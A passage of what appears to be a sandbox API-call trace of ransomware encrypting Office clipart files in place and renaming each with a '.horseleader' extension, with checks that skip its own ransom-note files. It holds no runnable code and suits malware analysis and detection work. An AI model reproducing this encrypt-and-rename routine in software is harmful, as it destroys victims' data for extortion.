hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x332e, lpOverlapped=0x0) returned 1 [0253.553] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffccd2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.553] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x332e, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x332e, lpOverlapped=0x0) returned 1 [0253.553] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.553] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.553] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.553] CloseHandle (hObject=0x158) returned 1 [0253.553] GetProcessHeap () returned 0x780000 [0253.554] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.554] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF.horseleader") returned 79 [0253.554] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00390_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF.horseleader" (normalized: "c:\\program files\\microsoft 
office\\clipart\\pub60cor\\bl00390_.wmf.horseleader")) returned 1 [0253.555] GetProcessHeap () returned 0x780000 [0253.555] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.555] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdcf0de00, ftCreationTime.dwHighDateTime=0x1bd4b03, ftLastAccessTime.dwLowDateTime=0x5f7031f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdcf0de00, ftLastWriteTime.dwHighDateTime=0x1bd4b03, nFileSizeHigh=0x0, nFileSizeLow=0x69aa, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00392_.WMF", cAlternateFileName="")) returned 1 [0253.555] lstrcmpiW (lpString1="BL00392_.WMF", lpString2="Windows") returned -1 [0253.555] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 67 [0253.555] StrStrIW (lpFirst="BL00392_.WMF", lpSrch=".horseleader") returned 0x0 [0253.555] lstrcmpW (lpString1="BL00392_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.555] lstrcmpW (lpString1="BL00392_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.555] lstrlenW (lpString=".testttjffg") returned 11 [0253.555] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.555] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.555] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.555] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00392_.wmf"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.556] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 67 [0253.556] StrStrW (lpFirst="BL00392_.WMF", lpSrch=".txt") returned 0x0 [0253.556] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=27050) returned 1 [0253.556] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.559] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.559] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.559] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x19aa, lpOverlapped=0x0) returned 1 [0253.560] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe656, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.560] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x19aa, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x19aa, lpOverlapped=0x0) returned 1 [0253.560] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.560] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, 
lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.560] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.560] CloseHandle (hObject=0x158) returned 1 [0253.560] GetProcessHeap () returned 0x780000 [0253.560] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.560] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF.horseleader") returned 79 [0253.561] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00392_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00392_.wmf.horseleader")) returned 1 [0253.561] GetProcessHeap () returned 0x780000 [0253.561] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.561] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd65d6900, ftCreationTime.dwHighDateTime=0x1bd4af9, ftLastAccessTime.dwLowDateTime=0x519ef6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd65d6900, ftLastWriteTime.dwHighDateTime=0x1bd4af9, nFileSizeHigh=0x0, nFileSizeLow=0x1b54, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00524_.WMF", cAlternateFileName="")) returned 1 [0253.561] lstrcmpiW (lpString1="BL00524_.WMF", lpString2="Windows") returned -1 [0253.562] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, 
pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 67 [0253.562] StrStrIW (lpFirst="BL00524_.WMF", lpSrch=".horseleader") returned 0x0 [0253.562] lstrcmpW (lpString1="BL00524_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.562] lstrcmpW (lpString1="BL00524_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.562] lstrlenW (lpString=".testttjffg") returned 11 [0253.562] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.562] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.562] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.562] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00524_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.563] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 67 [0253.563] StrStrW (lpFirst="BL00524_.WMF", lpSrch=".txt") returned 0x0 [0253.563] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=6996) returned 1 [0253.563] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1b54, lpOverlapped=0x0) returned 1 [0253.571] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe4ac, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.571] WriteFile (in: hFile=0x158, 
lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1b54, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1b54, lpOverlapped=0x0) returned 1 [0253.571] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.571] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.571] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.571] CloseHandle (hObject=0x158) returned 1 [0253.572] GetProcessHeap () returned 0x780000 [0253.572] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.572] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF.horseleader") returned 79 [0253.572] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00524_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00524_.wmf.horseleader")) returned 1 [0253.573] GetProcessHeap () returned 0x780000 [0253.573] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.573] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd52c3c00, ftCreationTime.dwHighDateTime=0x1bd4af9, 
ftLastAccessTime.dwLowDateTime=0x519ef6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd52c3c00, ftLastWriteTime.dwHighDateTime=0x1bd4af9, nFileSizeHigh=0x0, nFileSizeLow=0x2576, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00525_.WMF", cAlternateFileName="")) returned 1 [0253.574] lstrcmpiW (lpString1="BL00525_.WMF", lpString2="Windows") returned -1 [0253.574] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 67 [0253.574] StrStrIW (lpFirst="BL00525_.WMF", lpSrch=".horseleader") returned 0x0 [0253.574] lstrcmpW (lpString1="BL00525_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.574] lstrcmpW (lpString1="BL00525_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.574] lstrlenW (lpString=".testttjffg") returned 11 [0253.574] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.574] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.574] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.574] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00525_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.575] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 67 [0253.575] StrStrW (lpFirst="BL00525_.WMF", lpSrch=".txt") returned 0x0 [0253.575] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: 
lpFileSize=0x32aedd0*=9590) returned 1 [0253.575] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x2576, lpOverlapped=0x0) returned 1 [0253.581] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffda8a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.581] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x2576, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x2576, lpOverlapped=0x0) returned 1 [0253.581] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.581] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.581] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.581] CloseHandle (hObject=0x158) returned 1 [0253.581] GetProcessHeap () returned 0x780000 [0253.581] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.581] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF.horseleader") returned 79 [0253.581] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00525_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF.horseleader" (normalized: 
"c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00525_.wmf.horseleader")) returned 1 [0253.585] GetProcessHeap () returned 0x780000 [0253.585] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.585] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3fb0f00, ftCreationTime.dwHighDateTime=0x1bd4af9, ftLastAccessTime.dwLowDateTime=0x519ef6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd3fb0f00, ftLastWriteTime.dwHighDateTime=0x1bd4af9, nFileSizeHigh=0x0, nFileSizeLow=0x6ba0, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00526_.WMF", cAlternateFileName="")) returned 1 [0253.585] lstrcmpiW (lpString1="BL00526_.WMF", lpString2="Windows") returned -1 [0253.585] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 67 [0253.585] StrStrIW (lpFirst="BL00526_.WMF", lpSrch=".horseleader") returned 0x0 [0253.585] lstrcmpW (lpString1="BL00526_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.585] lstrcmpW (lpString1="BL00526_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.585] lstrlenW (lpString=".testttjffg") returned 11 [0253.585] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.585] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.585] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.585] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF" (normalized: "c:\\program files\\microsoft 
office\\clipart\\pub60cor\\bl00526_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.586] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 67 [0253.586] StrStrW (lpFirst="BL00526_.WMF", lpSrch=".txt") returned 0x0 [0253.586] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=27552) returned 1 [0253.586] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.590] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.590] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.590] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1ba0, lpOverlapped=0x0) returned 1 [0253.591] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe460, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.591] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1ba0, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1ba0, lpOverlapped=0x0) returned 1 [0253.591] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.591] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, 
nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.591] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.591] CloseHandle (hObject=0x158) returned 1 [0253.591] GetProcessHeap () returned 0x780000 [0253.591] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.591] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF.horseleader") returned 79 [0253.591] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00526_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00526_.wmf.horseleader")) returned 1 [0253.593] GetProcessHeap () returned 0x780000 [0253.593] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.593] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20fce500, ftCreationTime.dwHighDateTime=0x1bd4bcf, ftLastAccessTime.dwLowDateTime=0x5f7031f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x20fce500, ftLastWriteTime.dwHighDateTime=0x1bd4bcf, nFileSizeHigh=0x0, nFileSizeLow=0x2cec, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00648_.WMF", cAlternateFileName="")) returned 1 [0253.593] lstrcmpiW (lpString1="BL00648_.WMF", lpString2="Windows") returned -1 [0253.593] wnsprintfW (in: 
pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 67 [0253.593] StrStrIW (lpFirst="BL00648_.WMF", lpSrch=".horseleader") returned 0x0 [0253.593] lstrcmpW (lpString1="BL00648_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.593] lstrcmpW (lpString1="BL00648_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.593] lstrlenW (lpString=".testttjffg") returned 11 [0253.593] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.593] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.593] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.593] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00648_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.594] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 67 [0253.594] StrStrW (lpFirst="BL00648_.WMF", lpSrch=".txt") returned 0x0 [0253.594] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=11500) returned 1 [0253.594] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x2cec, lpOverlapped=0x0) returned 1 [0253.596] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd314, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.596] 
